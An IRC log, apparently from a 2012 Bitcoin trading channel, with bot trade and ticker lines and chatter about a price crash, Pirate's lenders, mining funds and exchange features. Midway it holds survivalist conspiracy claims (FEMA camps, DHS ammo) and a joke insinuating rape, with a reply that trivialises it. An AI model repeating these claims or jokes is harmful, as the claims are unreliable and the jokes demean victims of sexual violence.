before EUR Aug 19 23:49:02 [MPEX] [F.GIGA.ETF] 3400 @ 0.00092289 = 3.1378 BTC [-] Aug 19 23:49:09 3.5 -> 5 with no money spent Aug 19 23:49:35 no, from 1.5 -> 0.9 ... look mom, no hands Aug 19 23:49:55 but 5 is not worth shit any more Aug 19 23:50:01 this is my point Aug 19 23:50:59 [MPEX] [O.BTCUSD.C180N] 7 @ 0.08336057 = 0.5835 BTC [-] Aug 19 23:51:08 after the first, at least 6.2 Aug 19 23:51:13 [GLBSE] [NYAN.C] 1 @ 0.986 BTC [+] Aug 19 23:51:18 all fixed Mh/s turds are SHIT! untill difficulty starts to drop like drunken skier Aug 19 23:51:27 EskimoBob: okay? Aug 19 23:51:36 you do realize I hold none, right? Aug 19 23:51:44 yes I do Aug 19 23:52:13 I just hope you start converting NAV to something as unstable as Mh/s Aug 19 23:52:29 stop Aug 19 23:52:37 stop converting :) Aug 19 23:52:41 its just math. Aug 19 23:52:59 after this three month thing, I should have about 8.5mh/share Aug 19 23:53:00 you give wrong impression Aug 19 23:53:14 you make it look better than it actually is and this is not good Aug 19 23:53:15 and then asicmining, btc-mining, and obsi.abmo kicks in Aug 19 23:53:28 EskimoBob: well, right now, no one knows what to value what Aug 19 23:53:34 oh look, we are now at Nx5 Mh/s Aug 19 23:53:36 btc<->usd is psychotic Aug 19 23:53:53 sam time NAV has gone form N to N*0.5 Aug 19 23:54:09 well thats the thing Aug 19 23:54:16 no one has any clue what to value shit atm Aug 19 23:54:24 if we're going to go down to $5 again and stay there Aug 19 23:54:27 use BTC and this is it Aug 19 23:54:38 lets hope not Aug 19 23:54:59 1mh "turds" will be back up to 0.10/mh Aug 19 23:55:12 [GLBSE] [BDT] 10 @ 0.9499 = 9.499 BTC [+] Aug 19 23:55:13 [GLBSE] [BDT] 34 @ 0.95 = 32.3 BTC [+] Aug 19 23:55:14 [GLBSE] [BDT] 25 @ 0.95 = 23.75 BTC [+] Aug 19 23:55:15 [GLBSE] [BDT] 50 @ 0.96 = 48 BTC [+] Aug 19 23:55:16 [GLBSE] [BDT] 408 @ 0.998 = 407.184 BTC [+] Aug 19 23:55:17 [GLBSE] [BDT] 37 @ 0.999 = 36.963 BTC [+] Aug 19 23:55:18 until asicmining and the rest of the asic-backed shit starts paying out at asic rates Aug 19 23:55:19 [GLBSE] [BDT] 30 @ 1 = 30 BTC [+] Aug 19 23:55:25 which wont be until nov at the earliest Aug 19 23:55:43 fuck http://bitcoincharts.com is useless Aug 19 23:56:07 EskimoBob: the next motion I do may be suspend dividends until NAV reaches 1btc Aug 19 23:57:07 i think this is all cosmetics. Better come up with a idea how to make money for the fund Aug 19 23:57:10 oh and btw, I've crossed 100 ghash total Aug 19 23:57:15 EskimoBob: there isnt one Aug 19 23:57:19 this is why I created DMC Aug 19 23:57:26 so bitcoin had something to invest in that wasnt mining Aug 19 23:57:35 ... Aug 19 23:57:38 really? Aug 19 23:57:39 its called MINING innit ? Aug 19 23:57:47 mircea_popescu: yeah, Im actually considering a name change Aug 19 23:57:52 nose mining Aug 19 23:57:54 mining just isnt important to DMC's overall plan anymore Aug 19 23:57:55 I remember it was to create a bitcoin data center...for mining Aug 19 23:58:03 nefario: it was never strictly for mining Aug 19 23:58:13 what is it for now? Aug 19 23:58:16 at the time I could fill two racks with top of the line hardware and 51% attack the network Aug 19 23:58:22 now I dont need to fill one. Aug 19 23:58:36 Ultimately you will have to fufil your contract. Aug 19 23:58:37 what do I do with the other several dozen racks other than rent them out for $20k/mo Aug 19 23:58:41 usagi: yes Aug 19 23:58:48 [MPEX] [S.MPOE] 30800 @ 0.00038366 = 11.8167 BTC [+] Aug 19 23:58:51 usagi: and its not about the contract Aug 19 23:58:53 I want this to happen Aug 19 23:58:57 and I eventually get what I want Aug 19 23:59:35 DiabloD3: That fact you say Aug 19 23:59:37 that Aug 19 23:59:42 makes me believe in you Aug 20 00:00:11 Thats actually funny coming from you EmanuelDeOrtego Aug 20 00:00:36 Feel free to elaborate Aug 20 00:01:08 Mainly because you were just talking about doomsday scenarios, wich I actually side with you on which is exactly why I don’t see any long term future in much of this. Aug 20 00:01:41 I dont know when it all falls apart though, 1 year? 20 years? remains to be seen. Aug 20 00:01:59 Doffx: Well, 600 banking executives have quit in the past year. Aug 20 00:02:00 I think anyone with even a small amount of brains can see society is about to change. Aug 20 00:02:18 The wealthy are purchasing more and more properties in survivalist areas. Aug 20 00:02:23 Oh yeah, banking is the problem thats for sure. Aug 20 00:02:32 George Soros went all Gold but that could mean anything. Aug 20 00:03:08 Like I said I'm with you on something coming. Aug 20 00:03:20 The fact is we are overdue for another great depression. The DHS is stocking up on ammo rounds and FEMA has camps ready. Aug 20 00:03:28 What this could all mean varies. Aug 20 00:03:47 Means they are about to fight off massive civil unrest Aug 20 00:04:08 and the rich are protecting their assets by using the government ties to inforce it. Aug 20 00:04:10 All I know is I grow my own food and store water. Aug 20 00:04:15 I am not really concerned. Aug 20 00:04:34 If you live in a urban area, then you should be. Aug 20 00:04:49 I have done the same but im still concerned, you can do it alone either you need a good network of people in your community dont forget that Aug 20 00:04:57 err cant* Aug 20 00:05:15 I live in a nice small town where all the food is made Aug 20 00:05:25 Wife works at a large farm Aug 20 00:05:33 what is the other chan with the glbse stocks, the other one with the bot? Aug 20 00:05:33 I still dont feel safe. Aug 20 00:05:34 Dairy or...? Aug 20 00:05:50 Chaang-Noi: MPeX? Aug 20 00:05:54 Berries, corn, and dairy Aug 20 00:06:06 (4:58:54 AM) DiabloD3: I want this to happen Aug 20 00:06:06 (4:58:57 AM) DiabloD3: and I eventually get what I want Aug 20 00:06:10 no atlas, Aug 20 00:06:13 is that how you became a dady? Aug 20 00:06:15 Mmm, berries and dairy are good staples. Aug 20 00:06:27 nefario: a what? Aug 20 00:06:33 Daddy Aug 20 00:06:46 I'm insinuating you raped someone Aug 20 00:06:49 for fun Aug 20 00:06:55 the insinuating part Aug 20 00:07:01 not the rape part Aug 20 00:07:23 Hey, some women like getting "raped" for a hobby but it stops being rape then apparently. Aug 20 00:07:24 wtf am i jumping into? Aug 20 00:07:44 hahah I had the same reaction as Channd Aug 20 00:07:47 Chaang* Aug 20 00:07:49 asset cahn went to rape for fun chan? Aug 20 00:07:55 I just saw "Raped" in qoutation marks :P Aug 20 00:08:00 can't rape the willing Aug 20 00:08:05 i saw atlats and just wanted to move to the other chan... Aug 20 00:08:13 but cant remeber it, some one please pm me it Aug 20 00:08:23 Come on, Noi. I am not bad at all. Aug 20 00:08:25 i ahve some on topic questions about the last 48 hours (iv been away) Aug 20 00:08:26 I just speak honestly. Aug 20 00:08:33 you are not bad, just off topic Aug 20 00:08:54 Acknowledged. I'll stop. Aug 20 00:09:30 thanks Aug 20 00:09:34 whats up with the btc price Aug 20 00:09:42 its like 50% of what it was when i left 48 hours ago Aug 20 00:10:05 also the panic sale of ppt bonds has quit, market now has faith in pirate? Aug 20 00:10:13 DiabloD3: Second OBSI.ABMO ASIC upgrade paid for. Estimated hashrate at deliver 80.82 Ghash Aug 20 00:10:22 *delivery Aug 20 00:10:29 He came in to OTC said he would pay Chaang-Noi. Aug 20 00:10:38 that was Friday though. Aug 20 00:10:50 Obsi: whats that per share now? Aug 20 00:10:57 Now the speculation is hes paid some investors and they are selling. Aug 20 00:11:07 i was getting some of my bonds back at .5 and .6 crazy Aug 20 00:11:09 Dont think anyone actually knows the true reason for the selloff Aug 20 00:11:15 [MPEX] [S.MPOE] 490 @ 0.00038366 = 0.188 BTC [+] Aug 20 00:11:16 [MPEX] [S.MPOE] 13500 @ 0.00038544 = 5.2034 BTC [+] Aug 20 00:11:18 [MPEX] [S.MPOE] 8110 @ 0.00039193 = 3.1786 BTC [+] Aug 20 00:11:23 i see Aug 20 00:11:29 DiabloD3: 7.223 when BFL delivers on spec Aug 20 00:11:40 Yeah I snagged a bunch as well, if he pays I make another 30 or so btc. Aug 20 00:11:44 [GLBSE] [BDT] 150 @ 1 = 150 BTC [+] Aug 20 00:11:46 If not, well.. I lose everything. Aug 20 00:12:03 Obsi: ahh, so Ill just go edit this Aug 20 00:12:09 hmm... that's not counting the 1MHS shares Aug 20 00:12:12 so more actually Aug 20 00:12:26 Obsi: write a perl script =P Aug 20 00:13:20 DiabloD3: 7.759 counting the 1MHS bonds Aug 20 00:13:50 glee Aug 20 00:14:28 updates Aug 20 00:14:42 dmc is 5.50mh/share Aug 20 00:14:47 !ticker s.mpoe Aug 20 00:14:48 [MPEX:S.MPOE] 1day: 0.0003563 / 0.00038189 / 0.0003965 (2125718 shares, 811.80 BTC), 30day: 0.0001 / 0.00035454 / 0.0003965 (41764690 shares, 14,807.45 BTC) Aug 20 00:14:52 mircea_popescu ^^ Aug 20 00:15:02 aaaa Aug 20 00:15:07 that's liovely! Aug 20 00:15:16 !ticker S.BVPS Aug 20 00:15:20 [MPEX:S.BVPS] 1day: 0.00376575 / 0.00377829 / 0.003801 (1300 shares, 4.91 BTC), 30day: 0.001175 / 0.00308933 / 0.00435 (79028 shares, 244.14 BTC) Aug 20 00:15:27 sweet. Aug 20 00:18:15 [GLBSE] [TEEK.B] 1 @ 1 BTC [+] Aug 20 00:21:21 [GLBSE] [ASICMINER] 13 @ 0.09 = 1.17 BTC [-] Aug 20 00:22:41 [GLBSE] [ASICMINER] 5 @ 0.0899 = 0.4495 BTC [-] Aug 20 00:23:12 [GLBSE] [BDT] 3 @ 1.0001 = 3.0003 BTC [+] Aug 20 00:23:14 [GLBSE] [BDT] 97 @ 1 = 97 BTC [-] Aug 20 00:23:43 thanks a lot kakobrekla :D Aug 20 00:24:44 !ticker O.BTCUSD.P200T Aug 20 00:24:46 [MPEX:O.BTCUSD.P200T] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.49513636 / 0.65385299 / 1.02790394 (11000 shares, 7,192.38 BTC) Aug 20 00:25:30 [GLBSE] [NYAN.C] 2 @ 0.986 = 1.972 BTC [+] Aug 20 00:26:38 ;;ticker Aug 20 00:26:38 Best bid: 8.02341, Best ask: 8.09, Bid-ask spread: 0.06659, Last trade: 8.09998, 24 hour volume: 217452, 24 hour low: 7.58, 24 hour high: 11.95 Aug 20 00:26:47 [GLBSE] [NYAN.C] 3 @ 0.986 = 2.958 BTC [+] Aug 20 00:26:53 sooo... pirate has officially run out of bitcoins, that right ? Aug 20 00:27:19 umm Aug 20 00:27:23 [MPEX] [S.MPOE] 2990 @ 0.00039193 = 1.1719 BTC [+] Aug 20 00:27:25 [MPEX] [S.MPOE] 29700 @ 0.0003935 = 11.687 BTC [+] Aug 20 00:27:26 [MPEX] [S.MPOE] 26210 @ 0.00039606 = 10.3807 BTC [+] Aug 20 00:27:32 even if he is manipulating the price Aug 20 00:27:52 the trick is he must only trigger the downfall Aug 20 00:28:08 not keep it going Aug 20 00:29:35 [GLBSE] [FPGAMINING] 5 @ 0.92 = 4.6 BTC [-] Aug 20 00:29:44 well, we're in the red two days of 200k each Aug 20 00:32:10 [GLBSE] [CPA] 5 @ 0.08 = 0.4 BTC [-] Aug 20 00:34:03 crashing the price to be able to buy them back cheaper Aug 20 00:34:23 isn't that very much 1 step back 1&1/2 forward? Aug 20 00:34:31 yes. Aug 20 00:35:08 im pretty sure if you have 200k and want 300k, if you firesale your 200k the 300k will cost more than what 100k would have cost. Aug 20 00:35:12 or the market is just correcting the price to last months value Aug 20 00:35:14 and you'll end up with a higher price in the end. Aug 20 00:35:31 dub maybe Aug 20 00:35:54 combined with a shitload of already jumpy pirate investors panicing Aug 20 00:36:11 pirate investoers by that very definition have no btc to sell. Aug 20 00:36:15 "investors" Aug 20 00:36:18 gamblers Aug 20 00:36:30 the logical explanation here is : pirate is cashing out, by monday his wires have gone through Aug 20 00:36:41 and the "investors" can shoto themselves Aug 20 00:36:47 whatever, some have been cashing out of ppts for a while Aug 20 00:36:50 which really, they prolly should do in that circumstance. Aug 20 00:36:58 ppts aren't much. Aug 20 00:37:07 I dont think pirate is cashing out anything Aug 20 00:37:16 ^ Aug 20 00:37:19 I think he paid investors and they are cashing out Aug 20 00:37:28 possible. Aug 20 00:37:31 Makes more sense anyhow Aug 20 00:37:33 [GLBSE] [BLUECHIP] 4 @ 0.1 = 0.4 BTC Aug 20 00:37:35 [GLBSE] [BLUECHIP] 15 @ 0.1 = 1.5 BTC Aug 20 00:37:35 [GLBSE] [BLUECHIP] 4 @ 0.1 = 0.4 BTC Aug 20 00:37:37 [GLBSE] [BLUECHIP] 6 @ 0.1 = 0.6 BTC Aug 20 00:37:38 [GLBSE] [BLUECHIP] 75 @ 0.1 = 7.5 BTC Aug 20 00:37:39 [GLBSE] [BLUECHIP] 20 @ 0.1 = 2 BTC Aug 20 00:37:47 aha Aug 20 00:37:48 [GLBSE] [FPGAMINING] 9 @ 0.92 = 8.28 BTC [-] Aug 20 00:37:50 wtf is bluechip Aug 20 00:37:58 he's finally figured out where the sell button is Aug 20 00:39:26 [GLBSE] [BIB.PIRATE] 3 @ 0.6001 = 1.8003 BTC [-] Aug 20 00:39:26 [GLBSE] [BIB.PIRATE] 20 @ 0.6 = 12 BTC [-] Aug 20 00:39:28 [GLBSE] [BIB.PIRATE] 33 @ 0.531 = 17.523 BTC [-] Aug 20 00:39:35 oh sweet Aug 20 00:39:37 assbot does mpex Aug 20 00:39:41 !ticker s.bps Aug 20 00:39:43 !ticker s.bvps Aug 20 00:39:53 Invalid ticker. Aug 20 00:39:54 [MPEX:S.BVPS] 1day: 0.00376575 / 0.00377829 / 0.003801 (1300 shares, 4.91 BTC), 30day: 0.001175 / 0.00308933 / 0.00435 (79028 shares, 244.14 BTC) Aug 20 00:39:59 nefario: any assets on glbse that take advantage of shorting BTC? Aug 20 00:40:09 I don't know Aug 20 00:40:16 [GLBSE] [BDT] 171 @ 1 = 171 BTC [-] Aug 20 00:40:18 I'm not a trader Aug 20 00:40:31 rg yep Aug 20 00:40:33 but we're going to be adding curreny and margin Aug 20 00:40:54 We missed that chance, shorting any mining stock except Cognatus would have been huge profit! Aug 20 00:40:58 gabbynot: TEEK.USD Aug 20 00:41:07 thx Aug 20 00:41:24 [GLBSE] [FPGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 20 00:41:25 [GLBSE] [FPGAMINING] 3 @ 0.9 = 2.7 BTC [-] Aug 20 00:41:27 [GLBSE] [FPGAMINING] 15 @ 0.87 = 13.05 BTC [-] Aug 20 00:41:28 [GLBSE] [FPGAMINING] 10 @ 0.8612001 = 8.612 BTC [-] Aug 20 00:41:29 [GLBSE] [FPGAMINING] 4 @ 0.861 = 3.444 BTC [-] Aug 20 00:41:30 [GLBSE] [FPGAMINING] 50 @ 0.85 = 42.5 BTC [-] Aug 20 00:41:50 gabbynot: TEEK.USD Aug 20 00:42:23 not a ton of volume there, tho Aug 20 00:42:33 [GLBSE] [BIF.P2P.LOANS] 1 @ 0.1 BTC Aug 20 00:42:39 [GLBSE] [BDT] 2 @ 1 = 2 BTC [-] Aug 20 00:42:52 gabbynot: very true Aug 20 00:43:38 there's always options. Aug 20 00:43:40 i'm thinking we're hitting the 5's soon…maybe later tonight….so much panic right now Aug 20 00:44:08 don't want to sell my BTC, just want to hedge Aug 20 00:44:21 bluechip looks a pretty shady asset Aug 20 00:44:43 you can buy at .1 and sell at .05 Aug 20 00:45:01 gabbynot well that's exactly it. Aug 20 00:45:04 and 1 million shares offered Aug 20 00:45:10 [GLBSE] [COGNITIVE] 1 @ 0.6795 BTC [+] Aug 20 00:45:11 [GLBSE] [COGNITIVE] 13 @ 0.6796 = 8.8348 BTC [+] Aug 20 00:45:13 [GLBSE] [COGNITIVE] 6 @ 0.6797 = 4.0782 BTC [+] Aug 20 00:45:14 [GLBSE] [COGNITIVE] 1 @ 0.6798 BTC [+] Aug 20 00:45:15 [GLBSE] [COGNITIVE] 20 @ 0.6849 = 13.698 BTC [+] Aug 20 00:45:15 [GLBSE] [COGNITIVE] 5 @ 0.6998 = 3.499 BTC [+] Aug 20 00:45:17 [GLBSE] [COGNITIVE] 44 @ 0.73 = 32.12 BTC [+] Aug 20 00:46:43 any ideas mircea? Aug 20 00:46:58 [GLBSE] [ASICMINER] 20 @ 0.0999 = 1.998 BTC [+] Aug 20 00:47:16 o asicminer below ipo Aug 20 00:47:40 gabbynot options work exactly to hedge, not to sell your underlying. Aug 20 00:47:48 buy some puts. Aug 20 00:48:00 where? Aug 20 00:48:01 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Aug 20 00:48:12 http://polimedia.us/mpex Aug 20 00:48:20 [GLBSE] [TEEK.B] 3 @ 1.2449 = 3.7347 BTC [+] Aug 20 00:48:21 [GLBSE] [TEEK.B] 17 @ 1.245 = 21.165 BTC [+] Aug 20 00:48:52 never traded there, just glbse…thanks for the info, tho Aug 20 00:49:03 np. Aug 20 00:49:05 options will be on all GLBSE assets by the end of next week Aug 20 00:49:23 thanks nefario! Aug 20 00:49:51 nefario: are you doing anythign to fix performance? Aug 20 00:49:59 drinking tea Aug 20 00:50:04 but seriously Aug 20 00:50:04 yes Aug 20 00:50:16 tomorrow there will be an update to charts Aug 20 00:50:21 which will help a lot Aug 20 00:50:25 cool Aug 20 00:50:31 [GLBSE] [TYGRR.BOND-P] 8 @ 0.85 = 6.8 BTC [-] Aug 20 00:50:36 then 2 days later a rollout of new charts and public API Aug 20 00:51:18 cool thanks Aug 20 00:51:27 nefario, btw Aug 20 00:51:31 sounds exciting Aug 20 00:51:42 we noticed some trades in the past Aug 20 00:51:49 were not echoed on the twitter Aug 20 00:51:55 (and assbot) Aug 20 00:52:17 how far in the past? Aug 20 00:52:28 the last big purchase of asicminer Aug 20 00:52:33 ipo offer Aug 20 00:52:38 hmmm Aug 20 00:52:48 I've no idea why that was the case Aug 20 00:53:49 kakobrekla i had the same problem. thing is twitter won't repeat messages Aug 20 00:53:57 [GLBSE] [CBGB] 5 @ 0.5 = 2.5 BTC [+] Aug 20 00:53:57 if you have two orders of 5 at 5, it only puts in the first. Aug 20 00:55:10 ah Aug 20 00:55:12 cunts Aug 20 00:55:25 well timestamp in the tweet should help that Aug 20 00:55:29 they're getting very stingy with their platform Aug 20 00:55:30 maybe use microtime instead Aug 20 00:55:35 but i dont think that was the issue here Aug 20 00:55:37 "DiabloD3 | what do I do with the other several dozen racks other than rent them out for $20k/mo" and what was the price I quoted for you DiabloD3 ? Aug 20 00:55:43 afaik it was 1 big order Aug 20 00:55:51 you can make a shit load of money right now Aug 20 00:55:58 and a wild guess is glbse gaged out? Aug 20 00:56:05 well hm Aug 20 00:56:07 nevermind Aug 20 00:56:11 size of the order Aug 20 00:56:21 shouldnt do anything with the gaging out Aug 20 00:56:38 nefario should make IPO on GLBSE itself, for example to gather money to improve it Aug 20 00:56:39 since it was 1 ipo ask Aug 20 00:56:49 meh Aug 20 00:57:08 [GLBSE] [BDT] 2 @ 1.085 = 2.17 BTC [+] Aug 20 00:57:13 nefario, switch from time to microtime for nwo Aug 20 00:57:14 now Aug 20 00:57:15 [GLBSE] [SILVER] 6 @ 0.00999999 = 0.06 BTC [+] Aug 20 00:57:25 also dividend payout are still not twittin Aug 20 00:57:39 thats coming Aug 20 00:57:51 in 2 weeks 4 weeks ago :p Aug 20 00:58:17 [GLBSE] [HYDRO.BONDS] 1 @ 1.8899 BTC [+] Aug 20 00:58:59 after backend changes Aug 20 00:59:04 which are done tomorrow Aug 20 00:59:39 [GLBSE] [PUREMINING] 1 @ 0.13899999 BTC [+] Aug 20 01:00:07 [GLBSE] [MOVETO.FUND] 1 @ 1.15 BTC [-] Aug 20 01:00:13 [MPEX] [O.BTCUSD.C060N] 1 @ 0.49762207 BTC [-] Aug 20 01:00:27 !ticker B.MPCD.A Aug 20 01:00:29 !ticker B.MPCD.B Aug 20 01:00:29 [MPEX:B.MPCD.A] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.001 / 0.00369672 / 1.003 (371600 shares, 1,373.70 BTC) Aug 20 01:00:30 !ticker B.MPCD.C Aug 20 01:00:30 [MPEX:B.MPCD.B] 1day: 0.001008 / 0.001008 / 0.001008 (25000 shares, 25.20 BTC), 30day: 0.001 / 0.00100049 / 0.001008 (426500 shares, 426.71 BTC) Aug 20 01:00:31 [GLBSE] [BBBB] 250 @ 0.00028 = 0.07 BTC [+] Aug 20 01:00:32 [MPEX:B.MPCD.C] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.001 / 0.00100345 / 0.0010223 (414200 shares, 415.63 BTC) Aug 20 01:00:38 [GLBSE] [COGNITIVE] 1 @ 0.75 BTC [+] Aug 20 01:00:43 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8501 = 3.4004 BTC [+] Aug 20 01:00:45 [GLBSE] [TYGRR.BOND-P] 16 @ 0.85 = 13.6 BTC [-] Aug 20 01:01:24 30day: 0.001 / 0.00369672 / 1.003 Aug 20 01:01:26 O_O Aug 20 01:01:51 what ? Aug 20 01:01:58 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 20 01:02:15 [GLBSE] [GIGAMINING] 4 @ 1.0385 = 4.154 BTC [+] Aug 20 01:02:16 [GLBSE] [GIGAMINING] 6 @ 1.0386 = 6.2316 BTC [+] Aug 20 01:02:35 o, yeah. i think right after my initial offerings sold somebody put one up at like, crazy price, trying to get people confused as to value. Aug 20 01:03:04 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 20 01:03:37 heh Aug 20 01:09:55 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 20 01:10:01 ;;ticker Aug 20 01:10:02 Best bid: 7.99999, Best ask: 8, Bid-ask spread: 0.00001, Last trade: 8, 24 hour volume: 221854, 24 hour low: 7.58, 24 hour high: 11.91 Aug 20 01:10:13 i'd say this is catastrophic drops never before seen in btc Aug 20 01:10:24 not even during the great $30 crash did it go this fast. Aug 20 01:11:02 [GLBSE] [OBSI.HRPT] 15 @ 0.1 = 1.5 BTC [+] Aug 20 01:12:17 yep Aug 20 01:12:20 lost over 50% in 3 days Aug 20 01:12:58 good that we're young enough to still set records hehe Aug 20 01:13:08 otherwise this will be known as the flash crash of august. Aug 20 01:13:19 dark friday etc. Aug 20 01:13:23 what i dont understand is Aug 20 01:13:29 everyone was bitching that the price was so high Aug 20 01:13:31 now its low Aug 20 01:13:33 and no one is buying Aug 20 01:13:48 [GLBSE] [GIGAMINING] 1 @ 1.0386 BTC [+] Aug 20 01:13:53 rg eh forget it, peoplebitching. people bitch. Aug 20 01:13:58 doesn't mean anything. Aug 20 01:14:31 was the same exact thing back whern it was 2. when i joined and btc was 15 people were whinign that they don't want to pay money so the early adopters benefit. Aug 20 01:14:38 none of those put money in when it was 2. Aug 20 01:14:39 We're also on a weekend... Aug 20 01:14:47 [GLBSE] [ASICMINER] 1 @ 0.0999 BTC [+] Aug 20 01:14:52 if it stayed at 15 now, in two weeks you'd ehar how unfair it is they can't put money in Aug 20 01:15:07 Money starts flowing in again in a couple of hours, if it does... Aug 20 01:15:14 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8501 = 3.4004 BTC [+] Aug 20 01:15:16 [GLBSE] [TYGRR.BOND-P] 16 @ 0.85 = 13.6 BTC [-] Aug 20 01:15:45 a flood of BTC will hit the markets this week assuming pirate pays everyone. We'll see $5 soon Aug 20 01:16:00 i wouldnt mind it being 2 again lol. Aug 20 01:16:02 buy some more. Aug 20 01:16:12 Yeas, it's possible Aug 20 01:16:31 somebody was saying earlier, it's not pirate selling, its the people he repaid. Aug 20 01:16:32 If pirate pays, most of his lenders are cashing out like crazy... Aug 20 01:16:36 this may be quite correct really. Aug 20 01:17:04 [GLBSE] [COGNITIVE] 4 @ 0.75 = 3 BTC [+] Aug 20 01:17:07 panic breeds panic Aug 20 01:17:31 Yes, most speculators who just entered because the high interest rates Aug 20 01:17:56 yep, they'll want to cash out Aug 20 01:18:09 [GLBSE] [OBSI.HRPT] 65 @ 0.1 = 6.5 BTC [+] Aug 20 01:18:09 Well, now the btc will be free to be used for people really caring Aug 20 01:18:55 [GLBSE] [GIGAMINING] 1 @ 1.0386 BTC [+] Aug 20 01:19:17 second bubble taking us to $2 would do serious damage to BTC's image Aug 20 01:19:55 [GLBSE] [SYNERGY] 10 @ 0.189 = 1.89 BTC [+] Aug 20 01:19:57 [GLBSE] [ASICMINER] 4 @ 0.0999 = 0.3996 BTC [+] Aug 20 01:20:20 [GLBSE] [ASICMINER] 41 @ 0.1 = 4.1 BTC [+] Aug 20 01:20:40 Yes, something like that wouldn't look good Aug 20 01:20:41 gabbynot btc does not care. Aug 20 01:20:52 [18:15] If pirate pays, most of his lenders are cashing out like crazy... Aug 20 01:20:54 WHY Aug 20 01:20:59 rg roundtrip theory. Aug 20 01:21:02 those poeple have left thousands of dollars with pirate Aug 20 01:21:06 why would thye all of a sudden sell Aug 20 01:21:08 they wouldnt Aug 20 01:21:13 they will look for other ways to make money with thier btc Aug 20 01:21:13 ya they would. Aug 20 01:21:16 like they were with priate Aug 20 01:21:18 pirate* Aug 20 01:21:21 with some of it, yea Aug 20 01:21:26 but prolly principal goes back into bank./ Aug 20 01:21:30 peopel are slow to board. Aug 20 01:21:36 rg: because a lot of them was just speculators brought in by the high interest rate Aug 20 01:22:09 [GLBSE] [PAJKA.BOND] 11 @ 0.074 = 0.814 BTC [-] Aug 20 01:22:11 guy gets 1000 btc for i dunno, 5usd Aug 20 01:22:17 puts it with pirate, makes 1440 btc Aug 20 01:22:25 sells 1k btc for ~7k usd Aug 20 01:22:30 the other 440 is play money Aug 20 01:22:41 expect a lot of scam assets to be propped up with a deluge of easy money. Aug 20 01:22:53 exactly Aug 20 01:23:47 well Aug 20 01:23:49 [GLBSE] [USD] 10 @ 0.155 = 1.55 BTC [+] Aug 20 01:23:51 we have to wait for it to hit the floor Aug 20 01:23:51 [GLBSE] [USD] 5 @ 0.15553 = 0.7777 BTC [+] Aug 20 01:23:53 and it hasnt yet Aug 20 01:24:06 It would be a long week Aug 20 01:24:07 maybe not. Aug 20 01:24:10 question is….what's the floor? Aug 20 01:24:28 [GLBSE] [PAJKA.BOND] 4 @ 0.0743 = 0.2972 BTC [+] Aug 20 01:24:28 actually it could go as low as cents i think. Aug 20 01:24:33 yes…very long week Aug 20 01:24:55 The new best interest rate would be around 2 or 3%... Aug 20 01:25:05 rdponticelli mpoe pays 5% a month. Aug 20 01:25:07 The floor can be really low Aug 20 01:25:20 Yes, I know Aug 20 01:25:30 that's like 1.25 a week Aug 20 01:25:34 1.20 even Aug 20 01:25:35 I have some coins with you, remember? Aug 20 01:25:39 o you do ? Aug 20 01:25:47 [GLBSE] [PAJKA.BOND] 1 @ 0.07899999 BTC [+] Aug 20 01:25:49 i don't keep track of ppl liek that :p Aug 20 01:25:55 lol Aug 20 01:26:00 anonimity ftw! Aug 20 01:26:03 I found couple of bugs Aug 20 01:26:12 lol Aug 20 01:26:17 now that i remember. Aug 20 01:26:25 I don't care about anonimity Aug 20 01:26:51 I can make everything I do in the clear Aug 20 01:26:53 im thinking the floor is $5 Aug 20 01:27:00 once it hits $5, lots of people will be buying Aug 20 01:27:07 that's hwy the market is slow now, people wanna see where the bottom is Aug 20 01:27:19 it might be 1.x or 2.x Aug 20 01:27:26 rg: also the banks are closed Aug 20 01:27:45 yeah the timing of it got many people into knots im sure. Aug 20 01:27:54 collapse hit friday evening lol Aug 20 01:28:01 [MPEX] [S.MPOE] 6200 @ 0.00039578 = 2.4538 BTC [-] Aug 20 01:29:10 meh anyone who got burned Aug 20 01:29:10 [MPEX] [O.HASH.C10TH] 150000 @ 0.0000264 = 3.96 BTC [-] Aug 20 01:29:12 [GLBSE] [BTCMC] 4 @ 0.69001 = 2.76 BTC [+] Aug 20 01:29:13 its their own fault Aug 20 01:29:18 if you dont leave money to play around with Aug 20 01:29:23 you're still limited to 3 days Aug 20 01:29:25 for bank transfer Aug 20 01:29:26 they prolly exausted all that. Aug 20 01:29:28 so it doesnt change anything Aug 20 01:30:00 people don't leave much money to play with cause of perceived risk Aug 20 01:30:05 mtgox had a hack. th went down Aug 20 01:30:06 etc. Aug 20 01:30:08 rg: yes, the flows got cut on weekends Aug 20 01:30:21 There's always a dip Aug 20 01:33:12 [GLBSE] [FPGAMINING] 4 @ 0.9099 = 3.6396 BTC [+] Aug 20 01:33:17 [GLBSE] [GIGAMINING] 4 @ 0.9502 = 3.8008 BTC [-] Aug 20 01:34:31 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8789 = 3.5156 BTC [+] Aug 20 01:35:22 [GLBSE] [GIGAMINING] 6 @ 0.9501 = 5.7006 BTC [-] Aug 20 01:36:04 [GLBSE] [PUREMINING] 15 @ 0.1061 = 1.5915 BTC [-] Aug 20 01:36:06 [GLBSE] [PUREMINING] 5 @ 0.106 = 0.53 BTC [-] Aug 20 01:36:34 [GLBSE] [PUREMINING] 1 @ 0.1052 BTC [-] Aug 20 01:36:36 [GLBSE] [PUREMINING] 2 @ 0.105 = 0.21 BTC [-] Aug 20 01:36:46 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8789 = 3.5156 BTC [+] Aug 20 01:37:07 [GLBSE] [PUREMINING] 1 @ 0.1 BTC [-] Aug 20 01:37:08 [GLBSE] [PUREMINING] 10 @ 0.1 = 1 BTC [-] Aug 20 01:38:54 [MPEX] [F.PURE.SYNTH] 120000 @ 0.0001341 = 16.092 BTC [-] Aug 20 01:39:39 [GLBSE] [COGNITIVE] 5 @ 0.6501 = 3.2505 BTC [-] Aug 20 01:39:41 [GLBSE] [COGNITIVE] 3 @ 0.65 = 1.95 BTC [-] Aug 20 01:40:27 [GLBSE] [YABMC] 4 @ 0.1201 = 0.4804 BTC [-] Aug 20 01:41:05 [GLBSE] [FPGAMINING] 2 @ 0.91 = 1.82 BTC 